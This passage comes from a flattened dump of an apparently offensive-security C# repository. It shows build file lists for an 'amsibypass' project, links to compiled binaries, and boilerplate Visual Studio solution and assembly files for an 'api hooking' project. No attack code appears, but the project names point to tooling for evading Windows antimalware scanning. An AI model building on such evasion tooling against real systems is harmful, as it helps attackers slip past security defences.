C:\Users\stargirl\source\repos\amsibypass\amsipatch64\amsibypass\bin\Debug\amsibypass.exe 9 | C:\Users\stargirl\source\repos\amsibypass\amsipatch64\amsibypass\bin\Debug\amsibypass.pdb 10 | C:\Users\stargirl\source\repos\amsibypass\amsipatch64\amsibypass\obj\Debug\amsipatch64.csprojAssemblyReference.cache 11 | C:\Users\stargirl\source\repos\amsibypass\amsipatch64\amsibypass\obj\Debug\amsibypass.exe 12 | C:\Users\stargirl\source\repos\amsibypass\amsipatch64\amsibypass\obj\Debug\amsibypass.pdb 13 | -------------------------------------------------------------------------------- /amsipatch64/amsibypass/obj/Debug/amsipatch64.csprojAssemblyReference.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/amsipatch64/amsibypass/obj/Debug/amsipatch64.csprojAssemblyReference.cache -------------------------------------------------------------------------------- /api hooking/.vs/api hooking/v16/.suo: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/api hooking/.vs/api hooking/v16/.suo -------------------------------------------------------------------------------- /api hooking/.vs/api hooking/v16/Server/sqlite3/db.lock: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/api hooking/.vs/api hooking/v16/Server/sqlite3/db.lock -------------------------------------------------------------------------------- /api hooking/.vs/api hooking/v16/Server/sqlite3/storage.ide: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/api hooking/.vs/api hooking/v16/Server/sqlite3/storage.ide -------------------------------------------------------------------------------- /api hooking/.vs/api hooking/v16/Server/sqlite3/storage.ide-shm: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/api hooking/.vs/api hooking/v16/Server/sqlite3/storage.ide-shm -------------------------------------------------------------------------------- /api hooking/.vs/api hooking/v16/Server/sqlite3/storage.ide-wal: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/api hooking/.vs/api hooking/v16/Server/sqlite3/storage.ide-wal -------------------------------------------------------------------------------- /api hooking/api hooking.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Version 16 4 | VisualStudioVersion = 16.0.29318.209 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "api hooking", "api hooking\api hooking.csproj", "{AF42196F-DE90-4803-AEFA-830EEF6D50D2}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|Any CPU = Debug|Any CPU 11 | Release|Any CPU = Release|Any CPU 12 | EndGlobalSection 13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 14 | {AF42196F-DE90-4803-AEFA-830EEF6D50D2}.Debug|Any CPU.ActiveCfg = Debug|Any CPU 15 | {AF42196F-DE90-4803-AEFA-830EEF6D50D2}.Debug|Any CPU.Build.0 = Debug|Any CPU 16 | {AF42196F-DE90-4803-AEFA-830EEF6D50D2}.Release|Any CPU.ActiveCfg = Release|Any CPU 17 | {AF42196F-DE90-4803-AEFA-830EEF6D50D2}.Release|Any CPU.Build.0 = Release|Any CPU 18 | EndGlobalSection 19 | GlobalSection(SolutionProperties) = preSolution 20 | HideSolutionNode = FALSE 21 | EndGlobalSection 22 | GlobalSection(ExtensibilityGlobals) = postSolution 23 | SolutionGuid = {402B87F2-BA6F-4ECF-8A09-ADEAB8431B90} 24 | EndGlobalSection 25 | EndGlobal 26 | -------------------------------------------------------------------------------- /api hooking/api hooking/App.config: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /api hooking/api hooking/Properties/AssemblyInfo.cs: -------------------------------------------------------------------------------- 1 | using System.Reflection; 2 | using System.Runtime.CompilerServices; 3 | using System.Runtime.InteropServices; 4 | 5 | // General Information about an assembly is controlled through the following 6 | // set of attributes. Change these attribute values to modify the information 7 | // associated with an assembly. 8 | [assembly: AssemblyTitle("api hooking")] 9 | [assembly: AssemblyDescription("")] 10 | [assembly: AssemblyConfiguration("")] 11 | [assembly: AssemblyCompany("")] 12 | [assembly: AssemblyProduct("api hooking")] 13 | [assembly: AssemblyCopyright("Copyright © 2022")] 14 | [assembly: AssemblyTrademark("")] 15 | [assembly: AssemblyCulture("")] 16 | 17 | // Setting ComVisible to false makes the types in this assembly not visible 18 | // to COM components. If you need to access a type in this assembly from 19 | // COM, set the ComVisible attribute to true on that type. 20 | [assembly: ComVisible(false)] 21 | 22 | // The following GUID is for the ID of the typelib if this project is exposed to COM 23 | [assembly: Guid("af42196f-de90-4803-aefa-830eef6d50d2")] 24 | 25 | // Version information for an assembly consists of the following four values: 26 | // 27 | // Major Version 28 | // Minor Version 29 | // Build Number 30 | // Revision 31 | // 32 | // You can specify all the values or you can default the Build and Revision Numbers 33 | // by using the '*' as shown below: 34 | // [assembly: AssemblyVersion("1.0.*")] 35 | [assembly: AssemblyVersion("1.0.0.0")] 36 | [assembly: AssemblyFileVersion("1.0.0.0")] 37 | -------------------------------------------------------------------------------- /api hooking/api hooking/bin/Debug/api hooking.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/api hooking/api hooking/bin/Debug/api hooking.exe -------------------------------------------------------------------------------- /api hooking/api hooking/bin/Debug/api hooking.exe.config: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /api hooking/api hooking/bin/Debug/api hooking.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/api hooking/api hooking/bin/Debug/api hooking.pdb -------------------------------------------------------------------------------- /api hooking/api hooking/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/api hooking/api hooking/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache -------------------------------------------------------------------------------- /api hooking/api hooking/obj/Debug/api hooking.csproj.FileListAbsolute.txt: -------------------------------------------------------------------------------- 1 | C:\Users\stargirl\source\repos\api hooking\api hooking\bin\Debug\api hooking.exe.config 2 | C:\Users\stargirl\source\repos\api hooking\api hooking\bin\Debug\api hooking.exe 3 | C:\Users\stargirl\source\repos\api hooking\api hooking\bin\Debug\api hooking.pdb 4 | C:\Users\stargirl\source\repos\api hooking\api hooking\obj\Debug\api hooking.exe 5 | C:\Users\stargirl\source\repos\api hooking\api hooking\obj\Debug\api hooking.pdb 6 | C:\Users\stargirl\source\repos\api hooking\api hooking\obj\Debug\api hooking.csprojAssemblyReference.cache 7 | -------------------------------------------------------------------------------- /api hooking/api hooking/obj/Debug/api hooking.csprojAssemblyReference.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/api hooking/api hooking/obj/Debug/api hooking.csprojAssemblyReference.cache -------------------------------------------------------------------------------- /api hooking/api hooking/obj/Debug/api hooking.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/api hooking/api hooking/obj/Debug/api hooking.exe -------------------------------------------------------------------------------- /api hooking/api hooking/obj/Debug/api hooking.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/api hooking/api hooking/obj/Debug/api hooking.pdb --------------------------------------------------------------------------------